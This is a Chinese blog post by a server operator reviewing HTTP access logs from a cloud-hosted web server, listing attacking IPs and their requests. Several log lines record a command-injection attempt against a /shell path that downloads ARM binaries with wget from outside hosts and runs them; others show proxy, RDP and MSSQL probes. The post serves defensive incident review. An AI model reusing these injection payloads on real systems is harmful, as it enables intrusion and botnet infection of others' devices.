【网络安全】 关于http服务器遭受webshell攻击

1、背景

在阿里云公网上部署web服务器，最近客户反映我的服务经常断掉，查看后台日志，发现境外的IP攻击。
比如：

209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -

如下图：

2、ip地址查询

我使用的是马老师家的IP地址库查询：
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g

比如下面查询日志中可以的IP:
209.141.56.212

3、可疑请求ip

209.141.56.212

209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -

141.101.196.233
这个攻击者有点意思（友善？），查到我的服务器在中国就没接着攻击了，详细如下：

[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:17] "CONNECT 91.214.48.87:80 HTTP/1.1" 404 -
[ ERROR ] 141.101.196.233 - - [17/Sep/2021 12:58:27] code 400, message Bad request syntax ('\x04\x01\x00P[Ö0W0\x00')
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:27] "P[Ö0W0" HTTPStatus.BAD_REQUEST -
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:29] "POST http://proxy.kagda.ru/myip2.php?Z74857023071Q1 HTTP/1.1" 404 -

47.100.27.27

89.248.165.93 - - [13/Sep/2021 16:29:22] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.93 - - [13/Sep/2021 16:29:22] "[35m[1m  à          [0m" HTTPStatus.BAD_REQUEST -

205.185.115.123

205.185.115.123 - - [13/Sep/2021 19:30:50] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -

89.248.165.13

89.248.165.13 - - [13/Sep/2021 23:46:45] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.13 - - [13/Sep/2021 23:46:45] "[35m[1m  à          [0m" HTTPStatus.BAD_REQUEST -

205.185.115.123

205.185.115.123 - - [14/Sep/2021 04:52:39] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
205.185.115.123 - - [14/Sep/2021 10:27:01] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -

74.120.14.44

74.120.14.44 - - [14/Sep/2021 10:39:06] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x030âFh®\xad\x18\xad\x8c=\x8d\x07Ï4úiQß\x90æ\x92\x80±àTêP*6ß\x10\x08\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')
74.120.14.44 - - [14/Sep/2021 10:39:06] "[35m[1m {  w0âFh®­­Œ=Ï4úiQߐ撀±àTêP*6ß  À/À+ÀÀÀÀ	ÀÀ[0m" HTTPStatus.BAD_REQUEST -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -

185.219.52.154

185.219.52.154 - - [14/Sep/2021 22:34:50] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00É·\x00\x00')
185.219.52.154 - - [14/Sep/2021 22:34:50] "[35m[1m 4           ( ÿ U   MSSQLServer É·  [0m" HTTPStatus.BAD_REQUEST -

78.128.112.18

78.128.112.18 - - [15/Sep/2021 00:58:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
78.128.112.18 - - [15/Sep/2021 00:58:36] "[35m[1m  /*à     Cookie: mstshash=Administr[0m" HTTPStatus.BAD_REQUEST -

47.103.21.238

47.103.21.238 - - [15/Sep/2021 08:48:35] code 400, message Bad request version ("_¸<³'àA\x04\x9b\x84%.W7\x00\x00\x16À\x14\x005À\x13\x00/À,À+À0\x00\x9dÀ/\x00\x9c\x00")
47.103.21.238 - - [15/Sep/2021 08:48:35] "[35m[1m ˆ  „aAB㲂 øN5[‡ç47þ_¸<³'àA›„%.W7  À 5À /À,À+À0 À/ œ [0m" HTTPStatus.BAD_REQUEST -

161.189.134.11

161.189.134.11 - - [15/Sep/2021 14:27:33] code 400, message Bad request syntax ('{\x01\x00\x1615888888888À¨\x90Á\x13\x8a{')
161.189.134.11 - - [15/Sep/2021 14:27:33] "[35m[1m{ 15888888888À¨ÁŠ{[0m" HTTPStatus.BAD_REQUEST -